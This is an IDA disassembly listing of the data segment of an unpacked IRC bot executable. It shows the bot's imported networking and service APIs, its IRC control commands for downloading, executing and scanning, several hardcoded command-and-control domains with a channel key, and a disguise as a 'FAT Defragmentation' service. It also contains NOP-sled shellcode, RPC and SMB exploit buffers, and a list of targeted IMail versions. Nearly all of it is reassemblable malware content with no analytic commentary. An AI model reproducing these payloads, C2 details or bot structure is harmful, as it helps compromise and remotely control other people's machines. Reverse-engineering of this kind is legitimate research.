;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 4C95AE4B3D38375BDFF8B76F2EC75374
; File Name : u:\work\4c95ae4b3d38375bdff8b76f2ec75374_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00007000 ( 28672.)
; Section size in file : 00007000 ( 28672.)
; Offset to raw data for section: 00001000
; Flags C0000040: Data Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
code segment para public 'DATA' use32
assume cs:code
;org 401000h
dword_401000 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_4089F7+123�r ...
dword_401004 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExA ; sub_4089F7+13F�r
dword_401008 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExA ; sub_4089F7+155�r ...
dword_40100C dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_4089F7+15E�r ...
dword_401010 dd 77E37311h ; resolved to->ADVAPI32.DeleteServicedword_401014 dd 77DEADA7h ; resolved to->ADVAPI32.OpenSCManagerA ; sub_40899E+13�r ...
dword_401018 dd 77DEB88Ch ; resolved to->ADVAPI32.OpenServiceA ; sub_40899E+28�r ...
dword_40101C dd 77DE5E4Dh ; resolved to->ADVAPI32.CloseServiceHandle ; sub_40899E+47�r ...
dword_401020 dd 77E36F61h ; resolved to->ADVAPI32.ChangeServiceConfig2Adword_401024 dd 77E37071h ; resolved to->ADVAPI32.CreateServiceAdword_401028 dd 77DEB193h ; resolved to->ADVAPI32.SetServiceStatus ; sub_408C39+5D�r
dword_40102C dd 77DF0953h ; resolved to->ADVAPI32.RegisterServiceCtrlHandlerAdword_401030 dd 77E37D39h ; resolved to->ADVAPI32.StartServiceCtrlDispatcherA align 8
dword_401038 dd 7C80C108h ; resolved to->KERNEL32.SetThreadPrioritydword_40103C dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_401040 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_401044 dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounterdword_401048 dd 7C82FA46h ; resolved to->KERNEL32.QueryPerformanceFrequencydword_40104C dd 7C80AC0Fh ; resolved to->KERNEL32.SetErrorModedword_401050 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_401054 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenAdword_401058 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_408EAE+55�r
dword_40105C dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_401060 dd 7C835DCAh ; resolved to->KERNEL32.GetTempPathAdword_401064 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_401068 dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesAdword_40106C dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_408EAE+79�r ...
dword_401070 dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_401074 dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_401078 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_40107C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_404C8D+6D�r ...
dword_401080 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_404C8D+53�r ...
dword_401084 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_408D7F+129�r ...
dword_401088 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; code:00405457�r ...
dword_40108C dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSectiondword_401090 dd 7C81CE03h ; resolved to->KERNEL32.TerminateThread ; sub_40971A+5F�r
dword_401094 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSectiondword_401098 dd 7C80B829h ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCountdword_40109C dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSectiondword_4010A0 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; code:00407C41�r ...
dword_4010A4 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_408D7F+B7�r ...
dword_4010A8 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_408EAE+A5�r
dword_4010AC dd 7C86136Dh ; resolved to->KERNEL32.WinExec ; sub_40870A+1DF�r ...
dword_4010B0 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_4010B4 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_4010B8 dd 7C810637h ; resolved to->KERNEL32.CreateThread align 10h
dword_4010C0 dd 77C46040h ; resolved to->MSVCRT.strcatdword_4010C4 dd 77C371BCh ; resolved to->MSVCRT.sranddword_4010C8 dd 77C4173Bh ; resolved to->MSVCRT.fwritedword_4010CC dd 77C464BFh ; resolved to->MSVCRT._strnicmpdword_4010D0 dd 77C47660h ; resolved to->MSVCRT.strchrdword_4010D4 dd 77C41B72h ; resolved to->MSVCRT.sscanfdword_4010D8 dd 77C47730h ; resolved to->MSVCRT.strcmpdword_4010DC dd 77C1D730h ; resolved to->MSVCRT.strtouldword_4010E0 dd 77C4139Ch ; resolved to->MSVCRT.fseekdword_4010E4 dd 77C50290h ; resolved to->MSVCRT.ceildword_4010E8 dd 77C411FBh ; resolved to->MSVCRT.freaddword_4010EC dd 77C40AB1h ; resolved to->MSVCRT.fclosedword_4010F0 dd 77C29CDDh dword_4010F4 dd 77C371D3h ; resolved to->MSVCRT.randdword_4010F8 dd 77C3F931h ; resolved to->MSVCRT.sprintfdword_4010FC dd 77C46F70h ; resolved to->MSVCRT.memcpydword_401100 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_401104 dd 77C47920h ; resolved to->MSVCRT.strncatdword_401108 dd 77C46030h ; resolved to->MSVCRT.strcpydword_40110C dd 77C3F010h ; resolved to->MSVCRT.fopendword_401110 dd 77C3FE49h ; resolved to->MSVCRT.vsprintfdword_401114 dd 77C478A0h ; resolved to->MSVCRT.strlendword_401118 dd 77C2C407h ; resolved to->MSVCRT.mallocdword_40111C dd 77C2C437h ; resolved to->MSVCRT.reallocdword_401120 dd 77C4FA10h ; resolved to->MSVCRT._ftoldword_401124 dd 77C35C94h ; resolved to->MSVCRT._except_handler3dword_401128 dd 77C47CE5h ; resolved to->MSVCRT.strtokdword_40112C dd 77C4624Eh ; resolved to->MSVCRT._stricmpdword_401130 dd 77C1BF18h ; resolved to->MSVCRT.atoidword_401134 dd 77C47A90h ; resolved to->MSVCRT.strncpydword_401138 dd 77C47C60h ; resolved to->MSVCRT.strstrdword_40113C dd 77C3FA76h ; resolved to->MSVCRT._snprintfdword_401140 dd 77C2C21Bh ; resolved to->MSVCRT.free align 8
dword_401148 dd 74344AE7h dword_40114C dd 7432FF6Bh dword_401150 dd 743527D4h dword_401154 dd 743452A3h dword_401158 dd 74343318h dword_40115C dd 743273EDh dd 0
dword_401164 dd 7E418BF6h ; resolved to->USER32.TranslateMessagedword_401168 dd 7E4196B8h ; resolved to->USER32.DispatchMessageAdword_40116C dd 7E42E002h ; resolved to->USER32.GetMessageA dd 0
dword_401174 dd 42C2AE35h ; resolved to->WININET.InternetQueryDataAvailabledword_401178 dd 42C2CD78h ; resolved to->WININET.HttpSendRequestAdword_40117C dd 42C24399h ; resolved to->WININET.HttpOpenRequestAdword_401180 dd 42C249F2h ; resolved to->WININET.InternetConnectAdword_401184 dd 42C2C8A1h ; resolved to->WININET.InternetOpenAdword_401188 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedStatedword_40118C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_401190 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile align 8
dword_401198 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_404360+541�r ...
dword_40119C dd 71AB4428h ; resolved to->WS2_32.WSACleanup ; sub_408D7F+122�r ...
dd 71AB94DCh
dword_4011A4 dd 71AB615Ah ; resolved to->WS2_32.recv ; code:0040548A�r ...
dword_4011A8 dd 71AB428Ah ; resolved to->WS2_32.send ; code:loc_40545D�r ...
dword_4011AC dd 71AB406Ah ; resolved to->WS2_32.connect ; code:0040544B�r ...
dword_4011B0 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; code:00405432�r ...
dword_4011B4 dd 71AB3B91h ; resolved to->WS2_32.socket ; code:00406F30�r ...
dword_4011B8 dd 71AB9639h ; resolved to->WS2_32.closesocket ; code:00405D4B�r ...
dword_4011BC dd 71AB8769h ; resolved to->WS2_32.WSASocketA ; code:00405707�r ...
dword_4011C0 dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_4011C4 dd 71AB2DC0h ; resolved to->WS2_32.select ; sub_4073B4+8D�r ...
dword_4011C8 dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_407367+6�r
dword_4011CC dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_4011D0 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; code:00407D15�r ...
dword_4011D4 dd 71AB4519h ; resolved to->WS2_32.ioctlsocketdword_4011D8 dd 71AC1028h ; resolved to->WS2_32.accept ; text:0040811A�r
dword_4011DC dd 71AB2C69h ; resolved to->WS2_32.sendto ; code:00407E52�r
dword_4011E0 dd 71AB2D0Fh ; resolved to->WS2_32.recvfromdword_4011E4 dd 71ABE479h ; resolved to->WS2_32.gethostbyaddr ; sub_4091CA+5B�r
dword_4011E8 dd 71AC0B50h ; resolved to->WS2_32.getpeernamedword_4011EC dd 71AB88D3h ; resolved to->WS2_32.listendword_4011F0 dd 71AB3E00h ; resolved to->WS2_32.binddword_4011F4 dd 71AB3EA1h ; resolved to->WS2_32.setsockoptdword_4011F8 dd 71AC0BDEh ; resolved to->WS2_32.shutdowndword_4011FC dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_401200 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_40924C+2E�r
dword_401204 dd 71AB50C8h ; resolved to->WS2_32.gethostname align 10h
dword_401210 dd 25207325h, 2D3A2073h, 2343003h, 6C656873h, 646F636Ch
; DATA XREF: sub_404360+7FA�o
dd 2D020365h, 72756320h, 746E6572h, 6C20796Ch, 65747369h
dd 676E696Eh, 3A6E6F20h, 33300320h, 3A732502h, 2036425h
dd 74697720h, 30032068h, 64250234h, 73200203h, 73646E65h
dd 0A0Dh
a_shellcode_sta db '.shellcode.status',0 ; DATA XREF: sub_404360:loc_404B02�o
align 4
aSSS db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_404360+793�o
dword_401284 dd 33300320h, 746F7402h, 2036C61h, 3003203Ah, 64250234h
; DATA XREF: sub_404360+75E�o
dd 203h
dword_40129C dd 33300320h, 3642502h, 25202E02h, 73hdword_4012AC dd 3430032Dh, 70786502h, 74696F6Ch, 2036465h, 2Dh
; DATA XREF: sub_404360+6EB�o
a_scan_infected db '.scan.infected',0 ; DATA XREF: sub_404360:loc_404A2E�o
align 10h
dword_4012D0 dd 25207325h, 2D3A2073h, 2343003h, 6E616373h, 372656Eh
; DATA XREF: sub_404360+6B5�o
dd 69202D02h, 6365666Eh, 676E6974h, 646E6520h, 6F206465h
dd 3003206Eh, 73250233h, 0A0D0203h, 0
a_scan_stop db '.scan.stop',0 ; DATA XREF: sub_404360:loc_4049BE�o
align 4
dword_401314 dd 25207325h, 2D3A2073h, 2343003h, 6E616373h, 676E6520h
; DATA XREF: sub_404360+654�o
dd 3656E69h, 63202D02h, 65727275h, 796C746Eh, 61637320h
dd 6E696E6Eh, 30032067h, 73250233h, 0A0D0203h, 0
a_scan_current db '.scan.current',0 ; DATA XREF: sub_404360:loc_40497E�o
align 10h
asc_401360 db '-l',0 ; DATA XREF: sub_404360+5ED�o
align 4
aR_0 db '-r',0 ; DATA XREF: sub_404360+55C�o
align 4
asc_401368 db '-x',0 ; DATA XREF: sub_404360:loc_40487E�o
; sub_404360:loc_4048DC�o
align 4
aSD_D db '%s%d.%d',0 ; DATA XREF: sub_404360+4F9�o
a_: ; DATA XREF: sub_404360+4CA�o
unicode 0, <.>,0
aS_0 db '-s',0 ; DATA XREF: sub_404360:loc_4047D7�o
align 4
unk_40137C db 25h ; % ; DATA XREF: sub_404360+410�o
db 73h, 20h, 25h
db 73h ; s
db 20h, 3Ah, 2Dh
db 3
db 30h, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 72h, 3
db 2
aFailedModuleCh db '- failed module chosen doesn',27h,'t excist',0Dh,0Ah,0
align 4
aE db '-e',0 ; DATA XREF: sub_404360+3CA�o
align 10h
aScanner db 'Scanner',0 ; DATA XREF: sub_404360+3B6�o
; sub_404360+62F�o ...
a_scan_start db '.scan.start',0 ; DATA XREF: sub_404360:loc_4046BD�o
unk_4013D4 db 25h ; % ; DATA XREF: sub_404360+353�o
db 73h, 20h, 25h
db 73h ; s
db 20h, 3Ah, 2Dh
db 3
db 30h, 34h, 2
db 64h ; d
db 6Fh, 77h, 6Eh
db 6Ch ; l
db 6Fh, 61h, 64h
db 3
db 2, 2Dh, 20h
aFailedToDownlo db 'failed to download [%s]',0Dh,0Ah,0
align 4
dword_401408 dd 25207325h, 2D3A2073h, 2343003h, 6E776F64h, 64616F6Ch
; DATA XREF: sub_404360+341�o
dd 202D0203h, 6E776F64h, 64616F6Ch, 61206465h, 6520646Eh
dd 75636578h, 20646574h, 5D73255Bh, 206F7420h, 5D73255Bh
dd 30032820h, 6C250233h, 20020375h, 6920626Bh, 3003206Eh
dd 64250233h, 73200203h, 5B206365h, 2333003h, 2036425h
dd 2F626B20h, 5D636573h, 0A0D29h
dword_401478 dd 25207325h, 2D3A2073h, 2343003h, 6E776F64h, 64616F6Ch
; DATA XREF: sub_404360+30E�o
dd 202D0203h, 6E776F64h
db 6Ch
byte_401495 db 6Fh, 61h, 64h ; DATA XREF: code:off_402864�o
dd 5B206465h, 205D7325h, 5B206F74h, 205D7325h, 33300328h
dd 756C2502h, 6B200203h, 6E692062h, 33300320h, 3642502h
dd 65732002h, 35B2063h, 25023330h, 20020364h, 732F626Bh
dd 295D6365h, 0A0Dh
aUpd db '-upd',0 ; DATA XREF: sub_404360:loc_40457A�o
align 4
aExec db '-exec',0 ; DATA XREF: sub_404360+1FB�o
align 4
a_download_http db '.download.http',0 ; DATA XREF: sub_404360:loc_404526�o
align 4
a_irc_jump db '.irc.jump',0 ; DATA XREF: sub_404360:loc_4044FE�o
align 4
aPartS db 'PART %s',0Dh,0Ah,0 ; DATA XREF: sub_404360+197�o
align 4
a_irc_part db '.irc.part',0 ; DATA XREF: sub_404360:loc_4044E1�o
align 10h
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_404360+174�o
align 4
a_irc_join db '.irc.join',0 ; DATA XREF: sub_404360:loc_4044B8�o
align 4
dword_401538 dd 25207325h, 2D3A2073h, 2343003h, 64707466h, 202D0203h
; DATA XREF: sub_404360+14E�o
dd 72727563h, 6C746E65h, 696C2079h, 6E657473h, 20676E69h
dd 203A6E6Fh, 2333003h, 253A7325h, 20020364h, 68746977h
dd 34300320h, 3642502h, 65732002h, 0D73646Eh, 0Ah
a_ftpd_status db '.ftpd.status',0 ; DATA XREF: sub_404360:loc_40447D�o
align 4
a_bot_sysinfo db '.bot.sysinfo',0 ; DATA XREF: sub_404360:loc_404462�o
align 4
dword_4015A8 dd 25207325h, 2D3A2073h, 2343003h, 3746F62h, 6C202D02h
; DATA XREF: sub_404360+F8�o
dd 6C61636Fh, 3A504920h, 33300320h, 3732502h, 0A0D02h
a_bot_ip db '.bot.ip',0 ; DATA XREF: sub_404360:loc_404435�o
a_bot_os db '.bot.os',0 ; DATA XREF: sub_404360:loc_40441A�o
a_bot_uptime db '.bot.uptime',0 ; DATA XREF: sub_404360:loc_4043FF�o
aQuitGodHatesUs db 'QUIT :god hates us all',0Dh,0Ah,0 ; DATA XREF: sub_404360+86�o
align 4
a_bot_die db '.bot.die',0 ; DATA XREF: sub_404360:loc_4043D5�o
align 4
asc_401614: ; DATA XREF: sub_404360+2E�o
; code:00404F34�o
unicode 0, < >,0
aXlegion0x029 db 'xLegion/0x029',0 ; DATA XREF: sub_404D6D+C6�o
; code:00405353�o ...
align 4
aDfrgfat32_exe db 'dfrgfat32.exe',0 ; DATA XREF: code:004071CF�o
; code:00407D3F�o ...
align 4
aDfrgfat32_dll db 'dfrgfat32.dll',0
align 4
aFatDefragmenta db 'FAT Defragmentation',0 ; DATA XREF: sub_4089F7+36�o
; sub_4089F7+E8�o ...
aDefragmentatio db 'Defragmentation Management Handler',0 ; DATA XREF: sub_4089F7+31�o
align 10h
aMonitoringTheD db 'Monitoring the defragmentating process.',0 ; DATA XREF: sub_4089F7+65�o
aDfrgfat32 db 'dfrgfat32',0
align 4
aXxdfrgfat32xx db 'xxDfrgfat32xx',0 ; DATA XREF: sub_409022+4E�o
align 8
off_4016C8 dd offset a0x80_onlineSof ; DATA XREF: sub_404D6D+10�r
; sub_404D6D+3D�r
; "0x80.online-software.org"
word_4016CC dw 199Ch ; DATA XREF: sub_404D6D+53�r
align 10h
off_4016D0 dd offset byte_409CF0 ; DATA XREF: sub_404D6D+9C�r
; sub_404D6D+A2�r
off_4016D4 dd offset a29 ; DATA XREF: code:00404FB9�r
; code:00404FDE�r ...
; "#29#"
off_4016D8 dd offset aG3t0u7 ; DATA XREF: code:00404FD8�r
; code:00405315�r
; "g3t0u7"
dd offset aRaw ; "#raw"
off_4016E0 dd offset aXxplxx ; DATA XREF: code:00407538�r
; code:00407712�r ...
; "#xxplxx#"
dd offset a0x80_onlineSof ; "0x80.online-software.org"
dd 3FFh, 409CF0h, 4018ACh, 4018A4h, 40189Ch, 401890h, 401878h
dd 199Ch, 409CF0h, 4018ACh, 4018A4h, 40189Ch, 401890h
dd 401878h, 3FFh, 409CF0h, 4018ACh, 4018A4h, 40189Ch, 401890h
dd 401864h, 199Ch, 409CF0h, 4018ACh, 4018A4h, 40189Ch
dd 401890h, 401864h, 3FFh, 409CF0h, 4018ACh, 4018A4h, 40189Ch
dd 401890h, 401850h, 199Ch, 409CF0h, 4018ACh, 4018A4h
dd 40189Ch, 401890h, 401850h, 3FFh, 409CF0h, 4018ACh, 4018A4h
dd 40189Ch, 401890h, 401838h, 199Ch, 409CF0h, 4018ACh
dd 4018A4h, 40189Ch, 401890h, 401838h, 3FFh, 409CF0h, 4018ACh
dd 4018A4h, 40189Ch, 401890h, 401828h, 199Ch, 409CF0h
dd 4018ACh, 4018A4h, 40189Ch, 401890h, 401828h, 3FFh, 409CF0h
dd 4018ACh, 4018A4h, 40189Ch, 401890h
aMindleak_com db 'mindleak.com',0 ; DATA XREF: code:004051F3�o
align 4
a0x80_my1x1_com db '0x80.my1x1.com',0
align 4
a0x80_goingform db '0x80.goingformars.com',0
align 10h
a0x80_mySecure_ db '0x80.my-secure.name',0
a0xff_memzero_i db '0xff.memzero.info',0
align 4
a0x80_martianso db '0x80.martiansong.com',0
align 10h
aXxplxx db '#xxplxx#',0 ; DATA XREF: code:off_4016E0�o
align 4
aRaw db '#raw',0 ; DATA XREF: code:004016DC�o
align 4
aG3t0u7 db 'g3t0u7',0 ; DATA XREF: code:off_4016D8�o
align 4
a29 db '#29#',0 ; DATA XREF: code:off_4016D4�o
align 4
a0x80_onlineSof db '0x80.online-software.org',0 ; DATA XREF: code:off_4016C8�o
; code:004016E4�o
align 10h
aUserSSSSNickS db 'USER %s %s %s :%s',0Dh,0Ah ; DATA XREF: sub_404D6D+CE�o
; code:0040535B�o
db 'NICK %s',0Dh,0Ah,0
align 10h
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_404D6D+B4�o
align 4
aIrcread db 'IrcRead',0 ; DATA XREF: sub_404D6D+82�o
asc_401904: ; DATA XREF: code:0040529D�o
unicode 0, <*>,0
asc_401908: ; DATA XREF: code:00405219�o
unicode 0, <:>,0
a@_0: ; DATA XREF: code:004051A6�o
unicode 0, <@>,0
asc_401910: ; DATA XREF: code:00405170�o
unicode 0, <!>,0
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: code:00405117�o
asc_40191C db ' :',0 ; DATA XREF: code:004050DE�o
align 10h
a332 db '332',0 ; DATA XREF: code:004050CD�o
aError db 'ERROR',0 ; DATA XREF: code:004050B3�o
align 4
a465 db '465',0 ; DATA XREF: code:0040509E�o
a436 db '436',0 ; DATA XREF: code:00405074�o
; code:00405089�o
a009 db '009',0 ; DATA XREF: code:0040505F�o
a422 db '422',0 ; DATA XREF: code:0040504A�o
a001 db '001',0 ; DATA XREF: code:00405035�o
a451 db '451',0 ; DATA XREF: code:00405020�o
a433 db '433',0 ; DATA XREF: code:0040500B�o
a432 db '432',0 ; DATA XREF: code:loc_404FF6�o
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: code:00404FE4�o
; code:00405321�o
align 4
aKick db 'KICK',0 ; DATA XREF: code:loc_404F9A�o
align 4
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: code:00404F8B�o
align 10h
aPing db 'PING',0 ; DATA XREF: code:loc_404F6F�o
align 4
dword_401978 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
aFxnbfxfxnbfxfx: ; DATA XREF: code:004054EC�o
unicode 0, <FXNBFXFXNBFXFXFXFX>,0
align 4
dd 2 dup(7FFDE0CCh), 0
dword_4019F8 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: code:004054C4�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_401D5C dd 20h, 0 dd 20h, 5C005Ch, 0
aC1234561111111: ; DATA XREF: code:0040552B�o
unicode 0, <\C$\123456111111111111111.doc>,0
align 10h
dword_401DB0 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
dword_401DE4 dd 2180310h dword_401DE8 dd 10016C6h dword_401DEC dd 100139Dh, 1001C55h, 1001C98ha__ db 0Dh,0Ah ; DATA XREF: code:004053CE�o
; code:00405693�o ...
db '\_/.',0
align 10h
dword_401E00 dd 30B0005h, 10h, 48h, 0 dd 16D016D0h, 0
dd 1, 10000h, 4D9F4AB8h, 11CF7D1Ch, 20001E86h, 577C6EAFh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_401E4C dd 3000005h, 10h, 5 dup(0)dword_401E68 dd 10005h, 2 dup(0) dd 75757D58h, 47C6EB40h, 0A74E71BCh, 97B5D01Ch, 5 dup(0)
dd 90000h, 300h, 0
dd 300h, 5C005Ch, 0
dword_401EB0 dd 0 dd 2, 0
dd 1, 91C68h, 1, 2 dup(0)
dd 0C0h, 46000000h, 2 dup(1), 7
dword_401EE4 dd 0FC24448Bh, 0FFFAE005h, 0E0FFFFhdword_401EF0 dd 530458Bh, 0FFFFFB24h, 0E0FFhdword_401EFC dd 19EB10EBh, 0 dword_401F04 dd 0FFFF04EBh, 0FFFFhdword_401F0C dd 4EB04EBh, 0 dword_401F14 dd 0FFFF04EBh, 0FFFFhaA: ; DATA XREF: code:00405931�o
unicode 0, <\A>,0
align 8
dword_401F28 dd 77F33723h dword_401F2C dd 7FFDE0EBh dword_401F30 dd 18759Fh dword_401F34 dd 1001C59h dword_401F38 dd 1B0B0Bh dword_401F3C dd 6EBh dword_401F40 dd 0F4EBh, 0 dword_401F48 dd 0 dword_401F4C dd 10010579h ; code:00405D10�r
dd 0
dd 100108FEh, 0
dd 100108CBh, 0
dd 10010372h, 0
dd 1001038Fh, 0
dd 100103DFh, 0
dd 100139D6h, 0
dd 100102E2h, 0
dd 10010302h, 0
dd 100249D4h, 1, 10021835h, 1, 10021855h, 1, 100218E6h
dd 1, 10021782h, 1, 10021A51h, 1, 10021A62h
dword_401FC8 dd 20313061h, 49474F4Ch, 2622204Ehdword_401FD4 dd 0A9h dup(90909090h), 4EB9090hdword_40227C dd 90909090h, 4EB9090hdword_402284 dd 4 dup(90909090h), 335B0FEBh, 0E98366C9h, 553380EEh
; DATA XREF: code:00405D04�o
dd 0EBFAE243h, 0FFECE805h, 0BB8CFFFFh, 0A171218Ch, 5D94D50Ch
dd 0D556B8D5h, 0B4AA8BBCh, 1Eh dup(90909090h), 20229090h
dd 654C7822h, 6E6F6967h, 0A0D22h
a@ db 0Dh,0Ah ; DATA XREF: code:00405CB2�o
db '@$&',27h,'():*',0
align 10h
aImail8_15 db 'IMail 8.15',0 ; DATA XREF: code:00405C92�o
align 4
aImail8_14 db 'IMail 8.14',0 ; DATA XREF: code:00405C77�o
align 4
aImail8_13 db 'IMail 8.13',0 ; DATA XREF: code:00405C60�o
align 4
aImail8_12 db 'IMail 8.12',0 ; DATA XREF: code:00405C45�o
align 10h
aImail8_11 db 'IMail 8.11',0 ; DATA XREF: code:00405C2A�o
align 4
aImail8_10 db 'IMail 8.10',0 ; DATA XREF: code:00405C0C�o
align 4
aImail8_05 db 'IMail 8.05',0 ; DATA XREF: code:00405BEE�o
align 4
aImail8_04 db 'IMail 8.04',0 ; DATA XREF: code:00405BD0�o
align 10h
aImail8_03 db 'IMail 8.03',0 ; DATA XREF: code:00405BB2�o
align 4
aImail8_02 db 'IMail 8.02',0 ; DATA XREF: code:00405B9B�o
align 4
aImail8_01 db 'IMail 8.01',0 ; DATA XREF: code:00405B84�o
align 4
aImail8_00 db 'IMail 8.00',0 ; DATA XREF: code:00405B6D�o
align 10h
aImail7_15 db 'IMail 7.15',0 ; DATA XREF: code:00405B4F�o
align 4
aImail7_14 db 'IMail 7.14',0 ; DATA XREF: code:00405B38�o
align 4
aImail7_13 db 'IMail 7.13',0 ; DATA XREF: code:00405B21�o
align 4
aImail7_12 db 'IMail 7.12',0 ; DATA XREF: code:00405B03�o
align 10h
aImail7_11 db 'IMail 7.11',0 ; DATA XREF: code:00405AE5�o
align 4
aImail7_10 db 'IMail 7.10',0 ; DATA XREF: code:00405AC7�o
align 4
aImail7_07 db 'IMail 7.07',0 ; DATA XREF: code:00405AA9�o
align 4
aImail7_06 db 'IMail 7.06',0 ; DATA XREF: code:00405A92�o
align 10h
aImail7_05 db 'IMail 7.05',0 ; DATA XREF: code:00405A74�o
align 4
aImail7_04 db 'IMail 7.04',0 ; DATA XREF: code:00405A59�o
align 4
dword_402458 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: code:00406215�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002 db 'LM1.2X002',0
dw 4C02h
